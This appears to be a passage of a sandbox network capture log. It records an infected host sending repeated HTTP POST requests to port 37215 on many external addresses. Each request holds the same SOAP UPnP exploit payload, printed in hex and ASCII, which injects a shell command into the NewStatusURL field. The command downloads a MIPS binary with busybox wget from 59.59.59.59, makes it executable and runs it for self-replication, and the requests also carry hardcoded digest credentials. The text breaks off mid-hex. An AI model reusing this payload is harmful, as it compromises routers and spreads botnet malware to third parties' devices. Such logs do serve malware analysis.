                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1571192.168.2.1549874197.56.218.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.919105053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1572192.168.2.1550084148.69.186.18637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.919106960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1573192.168.2.154229241.171.142.18237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.919286966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1574192.168.2.1555618157.133.5.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.924520969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1575192.168.2.1534246157.26.249.10337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.924557924 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1576192.168.2.1547378197.26.88.5637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.926978111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1577192.168.2.154370661.61.243.20937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.927010059 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1578192.168.2.15417888.196.142.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.927036047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1579192.168.2.1547974157.145.17.4837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.927063942 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1580192.168.2.1551036197.196.169.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.927119017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 